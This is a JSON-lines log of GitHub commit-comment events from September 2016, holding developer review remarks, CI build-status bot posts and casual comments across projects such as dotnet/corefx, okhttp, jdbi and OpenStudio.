{"id":"4536867694","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953646,"position":30,"line":52,"path":"src/System.Security.Cryptography.Csp/src/System.Security.Cryptography.Csp.csproj","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:48:29Z","updated_at":"2016-09-08T21:48:29Z","body":"Needed to avoid pinvoke errors... I think there may be build tools change to fix this but we don't have it yet"}},"created_at":"2016-09-08T21:48:29Z"}
{"id":"4536868082","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953650,"position":35,"line":157,"path":"src/o3logon_fmt_plug.c","commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:48:35Z","updated_at":"2016-09-08T21:48:35Z","body":"Note, there are still issues, but this should be done.  It keeps INVALID utf-8 from being fed to the format in -fuzz mode."}},"created_at":"2016-09-08T21:48:35Z"}
{"id":"4536868731","type":"CommitCommentEvent","actor":{"login":"u01jmg3"},"repo":{"name":"s0600204/ics-parser-1"},"payload":{"comment":{"id":18953652,"position":null,"line":null,"path":null,"commit_id":"cc14cf1658640a99b0e31917c3485a47a35f4735","created_at":"2016-09-08T21:48:44Z","updated_at":"2016-09-08T21:48:44Z","body":":+1:"}},"created_at":"2016-09-08T21:48:44Z"}
{"id":"4536871002","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953663,"position":61,"line":46,"path":"src/System.Security.Cryptography.Csp/src/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:49:12Z","updated_at":"2016-09-08T21:49:12Z","body":"I needed to add this to compile, but not sure why."}},"created_at":"2016-09-08T21:49:12Z"}
{"id":"4536871112","type":"CommitCommentEvent","actor":{"login":"JakeWharton"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":18953664,"position":null,"line":null,"path":null,"commit_id":"7cefceb1ff51390397524474ca59f9d5e7ef3eca","created_at":"2016-09-08T21:49:13Z","updated_at":"2016-09-08T21:49:13Z","body":"Those tips back up this change if you read them correctly.\n\nOn Thu, Sep 8, 2016 at 5:47 PM Felipe Ribeiro R. Magalhães <\nnotifications@github.com> wrote:\n\n> Why is this better than the for-each version?\n> In fact I believe it is worse. Please refer to this performance tips by\n> Google:\n> https://developer.android.com/training/articles/perf-tips.html#Loops\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/square/okhttp/commit/7cefceb1ff51390397524474ca59f9d5e7ef3eca#commitcomment-18953634>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAEEEZFFOlTfQy43-e2dmnaJG0MX8lEwks5qoIJ4gaJpZM4J4fMp>\n> .\n>\n"}},"created_at":"2016-09-08T21:49:13Z"}
{"id":"4536877107","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953687,"position":5,"line":9,"path":"src/System.Security.Cryptography.Csp/tests/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:50:24Z","updated_at":"2016-09-08T21:50:24Z","body":"Indirectly needed by Algorithms, so needed to add this temporary for p2p to work"}},"created_at":"2016-09-08T21:50:24Z"}
{"id":"4536879013","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953690,"position":14,"line":20,"path":"src/System.Security.Cryptography.Csp/tests/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:50:46Z","updated_at":"2016-09-08T21:50:46Z","body":"Do I need this?"}},"created_at":"2016-09-08T21:50:46Z"}
{"id":"4536879658","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953693,"position":35,"line":40,"path":"src/System.Security.Cryptography.Csp/tests/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:50:55Z","updated_at":"2016-09-08T21:50:55Z","body":"No unix here"}},"created_at":"2016-09-08T21:50:55Z"}
{"id":"4536879864","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18953694,"position":null,"line":null,"path":null,"commit_id":"2636a7d8176ff0585de5e9db7df55b7fcd1fea5f","created_at":"2016-09-08T21:50:58Z","updated_at":"2016-09-08T21:50:58Z","body":"With more TC (120 for example) seems to be a regression. That´s why I asked if scalability is not affected.\r\n\r\nWe have a patch that passed STC :\r\nLLR: 2.95 (-2.94,2.94) [-3.00,1.00]\r\nTotal: 9649 W: 1829 L: 1689 D: 6131\r\n\r\nand then look its LTC:\r\nLLR: 2.95 (-2.94,2.94) [-3.00,1.00]\r\nTotal: 53494 W: 7254 L: 7178 D: 39062\r\n\r\nIf I´m not mistaken this patch affects king safety. The down curve is notorious...even if it passed by the rules, when you talk about king safety you need to be in the safe side. When you see this kind of behaviour of a patch this can´t be so good. You have a massive down curve...ok it can equalize with old code with longer TC but you need to be sure in my opinion. \r\n"}},"created_at":"2016-09-08T21:50:58Z"}
{"id":"4536884735","type":"CommitCommentEvent","actor":{"login":"salgadoeu"},"repo":{"name":"Nader-Sl/Hackemon"},"payload":{"comment":{"id":18953704,"position":null,"line":null,"path":null,"commit_id":"76c6032140214eb239d3502e68666cf40e94cf42","created_at":"2016-09-08T21:51:57Z","updated_at":"2016-09-08T21:51:57Z","body":"como faço o download?"}},"created_at":"2016-09-08T21:51:57Z"}
{"id":"4536886320","type":"CommitCommentEvent","actor":{"login":"kschamplin19"},"repo":{"name":"Foo-Bear/beartime-server"},"payload":{"comment":{"id":18953714,"position":null,"line":null,"path":null,"commit_id":"15e729ce0b8cc93706121d9a6520ec6a63f51fab","created_at":"2016-09-08T21:52:17Z","updated_at":"2016-09-08T21:52:17Z","body":"Relative paths do not work well for this because I don't recall the cwd of the frontend spawn. I already made this change on the server, so it doesn't need to happen elsewhere. The idea is that config.js is a template, and needs to be edited for deployment."}},"created_at":"2016-09-08T21:52:17Z"}
{"id":"4536887451","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18953718,"position":null,"line":null,"path":null,"commit_id":"46d4bee347e74f3495bf792166d0e71c732fc450","created_at":"2016-09-08T21:52:31Z","updated_at":"2016-09-08T21:52:31Z","body":"💯 👍 💯 👍 💯 👍 "}},"created_at":"2016-09-08T21:52:31Z"}
{"id":"4536888396","type":"CommitCommentEvent","actor":{"login":"jp-embedded"},"repo":{"name":"axypas/clippy.js"},"payload":{"comment":{"id":18953722,"position":null,"line":null,"path":null,"commit_id":"b8c623cca1609c71530458188c307f00a29b562a","created_at":"2016-09-08T21:52:42Z","updated_at":"2016-09-08T21:52:42Z","body":"How do I enable sound?"}},"created_at":"2016-09-08T21:52:42Z"}
{"id":"4536893718","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"robertohuertasm/vscode-icons"},"payload":{"comment":{"id":18953734,"position":null,"line":null,"path":null,"commit_id":"d1fb3eb495750aac7f52c66125770b41c7887662","created_at":"2016-09-08T21:53:48Z","updated_at":"2016-09-08T21:53:48Z","body":"Is the disclaimer part up to date? :smile: Shall I remove it?"}},"created_at":"2016-09-08T21:53:48Z"}
{"id":"4536893804","type":"CommitCommentEvent","actor":{"login":"FelipeRRM"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":18953735,"position":null,"line":null,"path":null,"commit_id":"7cefceb1ff51390397524474ca59f9d5e7ef3eca","created_at":"2016-09-08T21:53:49Z","updated_at":"2016-09-08T21:53:49Z","body":"Might have misinterpreted it, but it clearly says:\r\n\r\n> two() is fastest for devices without a JIT, and indistinguishable from one() for devices with a JIT. It uses the enhanced for loop syntax introduced in version 1.5 of the Java programming language.\r\n\r\nand two() is implemented using the for-each loop!"}},"created_at":"2016-09-08T21:53:49Z"}
{"id":"4536896627","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953739,"position":22,"line":28,"path":"src/System.Security.Cryptography.Csp/tests/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:54:24Z","updated_at":"2016-09-08T21:54:24Z","body":"Should these be in the csproj as conditional 1.6 pkproj instead, or will that cause the locally built version to be used (which doesn't exist for 1.6 as we don't x-compile that)? We want the real 1.6 version"}},"created_at":"2016-09-08T21:54:24Z"}
{"id":"4536900712","type":"CommitCommentEvent","actor":{"login":"JakeWharton"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":18953751,"position":null,"line":null,"path":null,"commit_id":"7cefceb1ff51390397524474ca59f9d5e7ef3eca","created_at":"2016-09-08T21:55:15Z","updated_at":"2016-09-08T21:55:15Z","body":"On an array. This is a list.\r\n\r\n> With an ArrayList, a hand-written counted loop is about 3x faster (with or without JIT), but for other collections the enhanced for loop syntax will be exactly equivalent to explicit iterator usage."}},"created_at":"2016-09-08T21:55:15Z"}
{"id":"4536901295","type":"CommitCommentEvent","actor":{"login":"omederos"},"repo":{"name":"y-yagi/better_errors"},"payload":{"comment":{"id":18953753,"position":5,"line":7,"path":"lib/better_errors/raised_exception.rb","commit_id":"1cae83d7d48bb7534fbb42668118adc348d8ce86","created_at":"2016-09-08T21:55:23Z","updated_at":"2016-09-08T21:55:23Z","body":"I was taking a look at this (I was subscribed to the issue related to the Rails 5 deprecation)... and I don't understand why you write the 1st `if` one way, and the `2nd` one differently... this could be like this:"}},"created_at":"2016-09-08T21:55:23Z"}
{"id":"4536902208","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/PRIMER-TRIMESTRE"},"payload":{"comment":{"id":18953758,"position":null,"line":null,"path":null,"commit_id":"630239a588e66bb78cb94716785ecfe28fe89839","created_at":"2016-09-08T21:55:34Z","updated_at":"2016-09-08T21:55:34Z","body":"Se realizo el planteamiento del problema:\r\n![captura1](https://cloud.githubusercontent.com/assets/21691880/18368334/0bf6e502-75e5-11e6-9449-69c7a61ab3b5.JPG)\r\n "}},"created_at":"2016-09-08T21:55:34Z"}
{"id":"4536903755","type":"CommitCommentEvent","actor":{"login":"JakeWharton"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":18953762,"position":null,"line":null,"path":null,"commit_id":"7cefceb1ff51390397524474ca59f9d5e7ef3eca","created_at":"2016-09-08T21:55:52Z","updated_at":"2016-09-08T21:55:52Z","body":"More info: http://jakewharton.com/eliminating-code-overhead/"}},"created_at":"2016-09-08T21:55:52Z"}
{"id":"4536904653","type":"CommitCommentEvent","actor":{"login":"aguilared"},"repo":{"name":"aguilared/db_socketio_mysql"},"payload":{"comment":{"id":18953766,"position":null,"line":null,"path":null,"commit_id":"ee284f38e1a0a28045fa7df141b64212b387b7d5","created_at":"2016-09-08T21:56:06Z","updated_at":"2016-09-08T21:56:06Z","body":"Copiado modificado el client.js"}},"created_at":"2016-09-08T21:56:06Z"}
{"id":"4536906733","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18953770,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T21:56:30Z","updated_at":"2016-09-08T21:56:30Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T21:56:30Z"}
{"id":"4536906798","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"emersion/go-js-canvas"},"payload":{"comment":{"id":18953771,"position":null,"line":null,"path":null,"commit_id":"118e42d42ef6f112bbc87c4f3a07d342af6901ab","created_at":"2016-09-08T21:56:31Z","updated_at":"2016-09-08T21:56:31Z","body":"Yeah, I was just saying thanks!"}},"created_at":"2016-09-08T21:56:31Z"}
{"id":"4536906965","type":"CommitCommentEvent","actor":{"login":"bhavyaab"},"repo":{"name":"bhavyaab/MasterBlaster"},"payload":{"comment":{"id":18953772,"position":null,"line":null,"path":null,"commit_id":"136e7f0abf76955e026f36830609a2b0dec2764a","created_at":"2016-09-08T21:56:33Z","updated_at":"2016-09-08T21:56:33Z","body":"ww"}},"created_at":"2016-09-08T21:56:33Z"}
{"id":"4536907269","type":"CommitCommentEvent","actor":{"login":"ViktorRohlin"},"repo":{"name":"bebo-rooms/wall"},"payload":{"comment":{"id":18953773,"position":150,"line":854,"path":"dist/style.css","commit_id":"2df8713e1f781bbaf1b5e16664fb009aaa666bcd","created_at":"2016-09-08T21:56:37Z","updated_at":"2016-09-08T21:56:37Z","body":"no"}},"created_at":"2016-09-08T21:56:37Z"}
{"id":"4536908555","type":"CommitCommentEvent","actor":{"login":"karaBASSbaraBASS"},"repo":{"name":"karaBASSbaraBASS/bombs-game"},"payload":{"comment":{"id":18953779,"position":54,"line":54,"path":"style.css","commit_id":"4862950bc0804aceb52425f4594f745d203298f7","created_at":"2016-09-08T21:56:52Z","updated_at":"2016-09-08T21:56:52Z","body":"what is this? explain me"}},"created_at":"2016-09-08T21:56:52Z"}
{"id":"4536910910","type":"CommitCommentEvent","actor":{"login":"brianm"},"repo":{"name":"HubSpot/jdbi"},"payload":{"comment":{"id":18953786,"position":30,"line":88,"path":"src/main/java/org/skife/jdbi/v2/unstable/BindIn.java","commit_id":"847b6415713878f3b166e3f13d9dd15827e434e6","created_at":"2016-09-08T21:57:22Z","updated_at":"2016-09-08T21:57:22Z","body":"Do you not want \"is not instanceof StringTemplate3StatementLocator\" ?"}},"created_at":"2016-09-08T21:57:22Z"}
{"id":"4536911398","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/PRIMER-TRIMESTRE"},"payload":{"comment":{"id":18953788,"position":null,"line":null,"path":null,"commit_id":"630239a588e66bb78cb94716785ecfe28fe89839","created_at":"2016-09-08T21:57:28Z","updated_at":"2016-09-08T21:57:28Z","body":"Se planteo el alcance del proyecto:\r\n![captura3](https://cloud.githubusercontent.com/assets/21691880/18368355/2f387bd4-75e5-11e6-8c80-b61304d60b07.JPG)\r\n"}},"created_at":"2016-09-08T21:57:28Z"}
{"id":"4536912682","type":"CommitCommentEvent","actor":{"login":"Zaifor"},"repo":{"name":"lhpopov/AddSense.js"},"payload":{"comment":{"id":18953794,"position":null,"line":null,"path":null,"commit_id":"59da058d5c94b95c839c950bd25daf45d6282405","created_at":"2016-09-08T21:57:44Z","updated_at":"2016-09-08T21:57:44Z","body":"You can omit 'data' from both DATA_LANG and dataLanguage. Just 'language' will be fine."}},"created_at":"2016-09-08T21:57:44Z"}
{"id":"4536915514","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/PRIMER-TRIMESTRE"},"payload":{"comment":{"id":18953804,"position":null,"line":null,"path":null,"commit_id":"630239a588e66bb78cb94716785ecfe28fe89839","created_at":"2016-09-08T21:58:20Z","updated_at":"2016-09-08T21:58:20Z","body":"Se realiza la justificación del proyecto:\r\n"}},"created_at":"2016-09-08T21:58:20Z"}
{"id":"4536916132","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18953805,"position":null,"line":null,"path":null,"commit_id":"6c0319fa685fecb14fe5815baa94ade2d7e48131","created_at":"2016-09-08T21:58:28Z","updated_at":"2016-09-08T21:58:28Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2300 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.27%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T21:58:28Z"}
{"id":"4536918059","type":"CommitCommentEvent","actor":{"login":"brianm"},"repo":{"name":"HubSpot/jdbi"},"payload":{"comment":{"id":18953808,"position":38,"line":71,"path":"src/main/java/org/skife/jdbi/v2/sqlobject/customizers/Define.java","commit_id":"8bac27504d1724869f01606302a1052d48cc9cb5","created_at":"2016-09-08T21:58:52Z","updated_at":"2016-09-08T21:58:52Z","body":"Same comment -- would it not be better to test for whether or not you already have a ST3 statement locator, rather than only supporting override of the classpath statement locator?"}},"created_at":"2016-09-08T21:58:52Z"}
{"id":"4536919971","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18953812,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T21:59:16Z","updated_at":"2016-09-08T21:59:16Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T21:59:16Z"}
{"id":"4536922095","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/PRIMER-TRIMESTRE"},"payload":{"comment":{"id":18953820,"position":null,"line":null,"path":null,"commit_id":"630239a588e66bb78cb94716785ecfe28fe89839","created_at":"2016-09-08T21:59:42Z","updated_at":"2016-09-08T21:59:42Z","body":"Técnicas de levantamiento de información:\r\n![captura5](https://cloud.githubusercontent.com/assets/21691880/18368450/9fd24d84-75e5-11e6-8f84-191f54ddff83.JPG)\r\n"}},"created_at":"2016-09-08T21:59:42Z"}
{"id":"4536928101","type":"CommitCommentEvent","actor":{"login":"brianm"},"repo":{"name":"HubSpot/jdbi"},"payload":{"comment":{"id":18953846,"position":38,"line":71,"path":"src/main/java/org/skife/jdbi/v2/sqlobject/customizers/Define.java","commit_id":"8bac27504d1724869f01606302a1052d48cc9cb5","created_at":"2016-09-08T22:00:55Z","updated_at":"2016-09-08T22:00:55Z","body":"Actually, rather than doing that here, best approach might be to implement a statement locator which does classpath *except* when you want to force it over to st3. \r\n\r\nI don't know the exact use case that lead to this, so all my comments may be bunkus, of course :-D"}},"created_at":"2016-09-08T22:00:55Z"}
{"id":"4536931001","type":"CommitCommentEvent","actor":{"login":"scheeles"},"repo":{"name":"scheeles/docker-k8s-mesos"},"payload":{"comment":{"id":18953855,"position":null,"line":null,"path":null,"commit_id":"89c00ee5346a75f6efea6c0c1025ca7a00813e2e","created_at":"2016-09-08T22:01:29Z","updated_at":"2016-09-08T22:01:29Z","body":"@ginkel done"}},"created_at":"2016-09-08T22:01:29Z"}
{"id":"4536931479","type":"CommitCommentEvent","actor":{"login":"tblaydes"},"repo":{"name":"strydercorp/documentation"},"payload":{"comment":{"id":18953857,"position":null,"line":null,"path":null,"commit_id":"8adfc6fda2538983699d7ea4301f5c752db73389","created_at":"2016-09-08T22:01:35Z","updated_at":"2016-09-08T22:01:35Z","body":"This isn't removing it. You can still access with a direct link, but it's\nhidden from index/sidebar\n\nOn Sep 8, 2016 2:21 PM, \"rjnordeen\" <notifications@github.com> wrote:\n\n> ya we shoudl not remove this.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/strydercorp/documentation/commit/8adfc6fda2538983699d7ea4301f5c752db73389#commitcomment-18951247>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AL8Dln_QGrrJzrINmkiLJ9q1tWQn66b_ks5qoGApgaJpZM4J4V4J>\n> .\n>\n"}},"created_at":"2016-09-08T22:01:35Z"}
{"id":"4536932531","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953859,"position":35,"line":157,"path":"src/o3logon_fmt_plug.c","commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T22:01:49Z","updated_at":"2016-09-08T22:01:49Z","body":"Changes made here.  868046e\r\n\r\nThe removal of split, and the if returning 0 were only some of the things needed."}},"created_at":"2016-09-08T22:01:49Z"}
{"id":"4536933083","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18953863,"position":null,"line":null,"path":null,"commit_id":"44a94d22d5e73d470a2383b496c59ac4e941346d","created_at":"2016-09-08T22:01:56Z","updated_at":"2016-09-08T22:01:56Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-44a94d22d5e73d470a2383b496c59ac4e941346d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-08T22:01:56Z"}
{"id":"4536933551","type":"CommitCommentEvent","actor":{"login":"GoelBiju"},"repo":{"name":"GoelBiju/pinybot"},"payload":{"comment":{"id":18953865,"position":null,"line":null,"path":null,"commit_id":"3e12291e18e5c1563857e0434509213010ac4281","created_at":"2016-09-08T22:02:02Z","updated_at":"2016-09-08T22:02:02Z","body":"Hi @CSpenz412 , to install PyAMF you need to do as it follows in the README file. \r\n\r\nIn command prompt enter the following and press enter:\r\n```terminal\r\nC:\\Python27\\Scripts\\pip2.exe install bs4 requests pysocks colorama pyamf\r\n```"}},"created_at":"2016-09-08T22:02:02Z"}
{"id":"4536937400","type":"CommitCommentEvent","actor":{"login":"Bubadabado"},"repo":{"name":"Bubadabado/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":18953868,"position":null,"line":null,"path":null,"commit_id":"4cb6b4c03af94e6db911911198486e4c46036227","created_at":"2016-09-08T22:02:52Z","updated_at":"2016-09-08T22:02:52Z","body":"ignore this please! it is a mistake!"}},"created_at":"2016-09-08T22:02:52Z"}
{"id":"4536937806","type":"CommitCommentEvent","actor":{"login":"rubo77"},"repo":{"name":"rubo77/freifunk-faltblatt-6-seiten"},"payload":{"comment":{"id":18953871,"position":null,"line":null,"path":null,"commit_id":"b17a1f530cfe967a876b25fe675f472a426bb3c7","created_at":"2016-09-08T22:02:56Z","updated_at":"2016-09-08T22:02:56Z","body":"Mergen funktioniert bei scribus sla und Gimp und PDF Dateien leider nicht\r\n\r\ncloses #8 "}},"created_at":"2016-09-08T22:02:56Z"}
{"id":"4536939474","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/PRIMER-TRIMESTRE"},"payload":{"comment":{"id":18953875,"position":null,"line":null,"path":null,"commit_id":"630239a588e66bb78cb94716785ecfe28fe89839","created_at":"2016-09-08T22:03:16Z","updated_at":"2016-09-08T22:03:16Z","body":"Encuesta tabulacion\r\n[Tabulacion.docx](https://github.com/Unifsena/PRIMER-TRIMESTRE/files/462793/Tabulacion.docx)\r\n\r\n"}},"created_at":"2016-09-08T22:03:16Z"}
{"id":"4536941682","type":"CommitCommentEvent","actor":{"login":"salgadoeu"},"repo":{"name":"Nader-Sl/Hackemon"},"payload":{"comment":{"id":18953878,"position":null,"line":null,"path":null,"commit_id":"47d70d747fad9d083afe96c9fd7538a65d4db2cb","created_at":"2016-09-08T22:03:41Z","updated_at":"2016-09-08T22:03:41Z","body":"sfdgfhjhklkjçl"}},"created_at":"2016-09-08T22:03:41Z"}
{"id":"4536943115","type":"CommitCommentEvent","actor":{"login":"Bubadabado"},"repo":{"name":"Bubadabado/Fowler-Tech-Club-Web-Site"},"payload":{"comment":{"id":18953884,"position":null,"line":null,"path":null,"commit_id":"dfb8fc742fcd93d9411930b7b8509b4210b7b467","created_at":"2016-09-08T22:04:02Z","updated_at":"2016-09-08T22:04:02Z","body":"Pranoy how do you add a link to this button"}},"created_at":"2016-09-08T22:04:02Z"}
{"id":"4536943336","type":"CommitCommentEvent","actor":{"login":"jhaber"},"repo":{"name":"HubSpot/jdbi"},"payload":{"comment":{"id":18953885,"position":30,"line":88,"path":"src/main/java/org/skife/jdbi/v2/unstable/BindIn.java","commit_id":"847b6415713878f3b166e3f13d9dd15827e434e6","created_at":"2016-09-08T22:04:05Z","updated_at":"2016-09-08T22:04:05Z","body":"To be conservative I only wanted to do this if using the default the statement locator. For example we have a modified `StringTemplate3StatementLocator` that wouldn't pass that check"}},"created_at":"2016-09-08T22:04:05Z"}
{"id":"4536943890","type":"CommitCommentEvent","actor":{"login":"davidemiraglia"},"repo":{"name":"davidemiraglia/hello-world"},"payload":{"comment":{"id":18953888,"position":null,"line":null,"path":null,"commit_id":"b901d4c694d01e76640c2588e741e993a926c9c5","created_at":"2016-09-08T22:04:13Z","updated_at":"2016-09-08T22:04:13Z","body":"I hope I will be successful"}},"created_at":"2016-09-08T22:04:13Z"}
{"id":"4536945620","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953891,"position":null,"line":null,"path":null,"commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T22:04:35Z","updated_at":"2016-09-08T22:04:35Z","body":"> I get really bad vibes here.\r\n\r\nThinks for pushing. Yes, putting split in there worked, but it was not really the best solution."}},"created_at":"2016-09-08T22:04:35Z"}
{"id":"4536945862","type":"CommitCommentEvent","actor":{"login":"rjnordeen"},"repo":{"name":"strydercorp/documentation"},"payload":{"comment":{"id":18953892,"position":null,"line":null,"path":null,"commit_id":"8adfc6fda2538983699d7ea4301f5c752db73389","created_at":"2016-09-08T22:04:38Z","updated_at":"2016-09-08T22:04:38Z","body":"Dont think we should remove it from the index/side bar though.\n\nOn Thu, Sep 8, 2016 at 3:01 PM Teena <notifications@github.com> wrote:\n\n> This isn't removing it. You can still access with a direct link, but it's\n> hidden from index/sidebar\n>\n> On Sep 8, 2016 2:21 PM, \"rjnordeen\" <notifications@github.com> wrote:\n>\n> > ya we shoudl not remove this.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/strydercorp/documentation/commit/8adfc6fda2538983699d7ea4301f5c752db73389#commitcomment-18951247\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AL8Dln_QGrrJzrINmkiLJ9q1tWQn66b_ks5qoGApgaJpZM4J4V4J\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n>\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/strydercorp/documentation/commit/8adfc6fda2538983699d7ea4301f5c752db73389#commitcomment-18953857>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANtLbAXMcmgb5_tRT4ZrvxFeDj5_3Xt0ks5qoIXAgaJpZM4J4V4J>\n> .\n>\n"}},"created_at":"2016-09-08T22:04:38Z"}
{"id":"4536950123","type":"CommitCommentEvent","actor":{"login":"hugocf"},"repo":{"name":"hugocf/split-the-treasure"},"payload":{"comment":{"id":18953900,"position":8,"line":20,"path":"src/test/scala/SplitTreasureSpec.scala","commit_id":"c4f46ff89830b64785e72a1519c283ea6f3f2c28","created_at":"2016-09-08T22:05:33Z","updated_at":"2016-09-08T22:05:33Z","body":">// Question: Should we continue to have this test even if the condition is no longer present?\r\n\r\nThe behaviour remains, right? I mean, it is still a condition that the algorithm must respect right?\r\n\r\nSure, now the code has evolved and the _generic_ algorithm can also handle this scenario well, but this scenario is still valid.\r\n\r\nIt also communicates clearly what is the behaviour when more we have hunters than gems: empty seq, instead of an errors, or something else!\r\n\r\nSome people see tests as documentation also… :)"}},"created_at":"2016-09-08T22:05:33Z"}
{"id":"4536955486","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18953921,"position":null,"line":null,"path":null,"commit_id":"05801fdda67fafdae3a9753dbb34bcc36b51e80d","created_at":"2016-09-08T22:06:45Z","updated_at":"2016-09-08T22:06:45Z","body":"+1"}},"created_at":"2016-09-08T22:06:45Z"}
